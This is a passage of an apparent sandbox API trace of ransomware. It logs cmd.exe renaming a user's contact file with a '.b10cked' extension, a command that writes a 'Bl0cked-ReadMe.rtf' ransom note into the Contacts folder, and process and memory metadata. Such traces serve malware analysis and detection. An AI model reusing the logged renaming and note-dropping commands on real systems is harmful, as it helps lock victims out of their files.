GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ff4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ff4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ff4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ff4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ff4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ff4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ff4930, cchData=8 | out: lpLCData=".") returned 2 [0217.980] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ff4920, cchData=8 | out: lpLCData=",") returned 2 [0217.980] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0217.980] GetConsoleTitleW (in: lpConsoleTitle=0xb08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.981] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.981] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0217.981] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0217.981] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0217.981] _wcsicmp (_String1="move", _String2=")") returned 68 [0217.981] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0217.981] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0217.981] _wcsicmp (_String1="IF", _String2="move") returned -4 [0217.981] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0217.981] _wcsicmp (_String1="REM", _String2="move") returned 5 [0217.982] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0217.984] GetConsoleTitleW (in: lpConsoleTitle=0x30f2b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.984] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0217.984] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0217.984] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0217.984] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0217.984] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0217.984] _wcsicmp (_String1="move", _String2="CD") returned 10 [0217.984] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0217.984] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0217.984] _wcsicmp (_String1="move", _String2="REN") returned -5 [0217.984] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0217.984] _wcsicmp (_String1="move", _String2="SET") returned -6 [0217.984] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0217.984] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0217.984] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0217.984] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0217.984] _wcsicmp (_String1="move", _String2="MD") returned 11 [0217.984] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0217.984] _wcsicmp (_String1="move", _String2="RD") returned -5 [0217.984] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0217.984] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0217.984] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0217.985] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0217.985] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0217.985] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0217.985] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0217.985] _wcsicmp (_String1="move", _String2="VER") returned -9 [0217.985] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0217.985] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0217.985] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0217.985] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0217.985] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0217.985] _wcsicmp (_String1="move", _String2="START") returned -6 [0217.985] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0217.985] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0217.985] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0217.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.986] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f074, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f06c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f06c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0217.988] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0217.988] _wcsicmp (_String1="ADMINI~1.CON", _String2=".") returned 51 [0217.988] _wcsicmp (_String1="ADMINI~1.CON", _String2="..") returned 51 [0217.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\admini~1.con")) returned 0x20 [0217.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xc1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.988] SetErrorMode (uMode=0x0) returned 0x0 [0217.988] SetErrorMode (uMode=0x1) returned 0x0 [0217.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", nBufferLength=0x104, lpBuffer=0x30e9fc, lpFilePart=0x30e9e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", lpFilePart=0x30e9e4*="ADMINI~1.CON") returned 0x26 [0217.988] SetErrorMode (uMode=0x0) returned 0x1 [0217.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x11 [0217.988] _wcsicmp (_String1="ADMINI~1.CON", _String2=".") returned 51 [0217.988] _wcsicmp (_String1="ADMINI~1.CON", _String2="..") returned 51 [0217.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\admini~1.con")) returned 0x20 [0217.989] SetErrorMode (uMode=0x0) returned 0x0 [0217.989] SetErrorMode (uMode=0x1) returned 0x0 [0217.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", nBufferLength=0x104, lpBuffer=0x30ee78, lpFilePart=0x30ec10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", lpFilePart=0x30ec10*="ADMINI~1.CON") returned 0x26 [0217.989] SetErrorMode (uMode=0x0) returned 0x1 [0217.989] SetErrorMode (uMode=0x0) returned 0x0 [0217.989] SetErrorMode (uMode=0x1) returned 0x0 [0217.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked", nBufferLength=0x104, lpBuffer=0x30f080, lpFilePart=0x30ec10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked", lpFilePart=0x30ec10*="Administrator.contact.b10cked") returned 0x37 [0217.989] SetErrorMode (uMode=0x0) returned 0x1 [0217.989] SetLastError (dwErrCode=0x0) [0217.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact.b10cked")) returned 0xffffffff [0217.989] GetLastError () returned 0x2 [0217.989] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", fInfoLevelId=0x1, lpFindFileData=0x30e58c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e58c) returned 0xb0e58 [0217.989] FindNextFileW (in: hFindFile=0xb0e58, lpFindFileData=0x30e58c | out: lpFindFileData=0x30e58c) returned 0 [0217.990] GetLastError () returned 0x12 [0217.990] FindClose (in: hFindFile=0xb0e58 | out: hFindFile=0xb0e58) returned 1 [0217.991] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", fInfoLevelId=0x1, lpFindFileData=0xc1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc1bd8) returned 0xb0e58 [0217.991] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked", nBufferLength=0x104, lpBuffer=0x30e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked", lpFilePart=0x0) returned 0x37 [0217.991] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", nBufferLength=0x104, lpBuffer=0x30e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0217.991] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact")) returned 0x20 [0217.991] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact.b10cked"), dwFlags=0x3) returned 1 [0217.991] FindClose (in: hFindFile=0xb0e58 | out: hFindFile=0xb0e58) returned 1 [0217.992] _vsnwprintf (in: _Buffer=0x49ff5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30e7d8 | out: _Buffer=" 1") returned 9 [0217.992] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.992] GetFileType (hFile=0x7) returned 0x2 [0218.017] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0218.017] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30e764 | out: lpMode=0x30e764) returned 1 [0218.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.017] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30e798 | out: lpConsoleScreenBufferInfo=0x30e798) returned 1 [0218.017] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a004640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0218.018] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a004640, nSize=0x2000, Arguments=0x30e7d8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0218.018] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a004640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30e7bc, lpReserved=0x0 | out: lpBuffer=0x4a004640*, lpNumberOfCharsWritten=0x30e7bc*=0x1a) returned 1 [0218.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.018] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.018] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0218.018] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.018] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0218.018] SetConsoleInputExeNameW () returned 0x1 [0218.018] GetConsoleOutputCP () returned 0x1b5 [0218.019] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.019] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.019] exit (_Code=0) Process: id = "560" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16cc0" os_pid = "0x8c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32499 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32500 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32501 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32502 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 32503 start_va = 0x49fd0000 end_va = 0x4a01bfff entry_point = 0x49fd0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32504 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32505 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32506 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32507 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32508 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32592 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32593 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32594 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32595 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 32596 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 32597 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32598 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32599 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32600 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32601 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32602 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32603 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32604 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32605 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32606 start_va = 0x4a0000 end_va = 0x567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 32607 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32608 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32609 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32610 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 32611 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32612 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32613 start_va = 0x570000 end_va = 0x670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 32614 start_va = 0x680000 end_va = 0x127ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 32615 start_va = 0x1280000 end_va = 0x13e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Thread: id = 764 os_tid = 0xc04 [0218.053] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f83c | out: lpSystemTimeAsFileTime=0x24f83c*(dwLowDateTime=0xb6c61300, dwHighDateTime=0x1d440a9)) [0218.053] GetCurrentProcessId () returned 0x8c8 [0218.053] GetCurrentThreadId () returned 0xc04 [0218.053] GetTickCount () returned 0x3cf11 [0218.053] QueryPerformanceCounter (in: lpPerformanceCount=0x24f834 | out: lpPerformanceCount=0x24f834*=27484251708) returned 1 [0218.054] GetModuleHandleA (lpModuleName=0x0) returned 0x49fd0000 [0218.054] __set_app_type (_Type=0x1) [0218.054] __p__fmode () returned 0x76b331f4 [0218.054] __p__commode () returned 0x76b331fc [0218.054] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ff21a6) returned 0x0 [0218.054] __getmainargs (in: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c, _DoWildCard=0, _StartInfo=0x49ff4140 | out: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c) returned 0 [0218.054] GetCurrentThreadId () returned 0xc04 [0218.054] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc04) returned 0x38 [0218.054] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0218.054] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0218.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.055] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.055] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f7cc | out: phkResult=0x24f7cc*=0x0) returned 0x2 [0218.055] VirtualQuery (in: lpAddress=0x24f803, lpBuffer=0x24f79c, dwLength=0x1c | out: lpBuffer=0x24f79c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.055] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f79c, dwLength=0x1c | out: lpBuffer=0x24f79c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0218.055] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f79c, dwLength=0x1c | out: lpBuffer=0x24f79c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0218.055] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f79c, dwLength=0x1c | out: lpBuffer=0x24f79c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.055] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f79c, dwLength=0x1c | out: lpBuffer=0x24f79c*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0218.055] GetConsoleOutputCP () returned 0x1b5 [0218.055] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.055] SetConsoleCtrlHandler (HandlerRoutine=0x49fee72a, Add=1) returned 1 [0218.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.055] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0218.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.055] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0218.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.056] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.056] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.056] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0218.056] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.056] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0218.056] GetEnvironmentStringsW () returned 0x3b0168* [0218.056] FreeEnvironmentStringsW (penv=0x3b0168) returned 1 [0218.056] GetEnvironmentStringsW () returned 0x3b0168* [0218.056] FreeEnvironmentStringsW (penv=0x3b0168) returned 1 [0218.056] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e73c | out: phkResult=0x24e73c*=0x40) returned 0x0 [0218.056] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x90, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x1, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x1, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x0, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x40, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, 